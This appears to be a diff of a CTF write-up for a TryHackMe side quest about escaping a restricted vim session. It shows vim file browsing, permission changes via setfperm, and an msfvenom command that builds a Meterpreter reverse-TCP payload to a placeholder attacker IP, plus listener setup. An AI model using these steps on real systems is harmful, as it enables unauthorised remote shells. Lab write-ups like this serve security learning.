JoanneBiltz/CTF-Writeups/2023_THM_AOC_Side_Quests/frosteau_busy_with_vim/README.md

 -If you exit vim you are kicked out of the connection.
 -You can see the directories inside vim using `:e /` then `:e /directory_name`.
 -Trying to run commands using :! from vim gives an error `Cannot execute shell /tmp/sh`.
--After looking through many files and directories we determined that /tmp/sh was empty and not executable.
+-After looking through many files and directories I determined that /tmp/sh was empty and not executable.
 -There is also a user frosty that has /usr/frosty/sh that is empty but is executable.
 We might be able to use that to get a shell.
 -If you go to the /home directory you will find the user ubuntu.
--We tried all kinds of shells in vim but didn't have any luck.
+-I tried all kinds of shells in vim but didn't have any luck.
--We can set permissions with `:call setfperm("/tmp/sh","rwxrwxrwx")`.
+-I can set permissions with `:call setfperm("/tmp/sh","rwxrwxrwx")`.
 -`:e /etc/shells` gives us `/usr/busybox/sh`.
 -It seems the 8065 port points to `/usr/frosty/sh`.
 ```
-At this point we decided to try a reverse shell using metasploit in order to get a prompt outside of vim.
+At this point I decided to try a reverse shell using metasploit in order to get a prompt outside of vim.
 ```
 -Create your payload using `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f elf -o payload.elf`.
 -Start your listener in `msfconsole` and use `payload/linux/x64/meterpreter/reverse_tcp`, then `set hosts YOUR_IP`.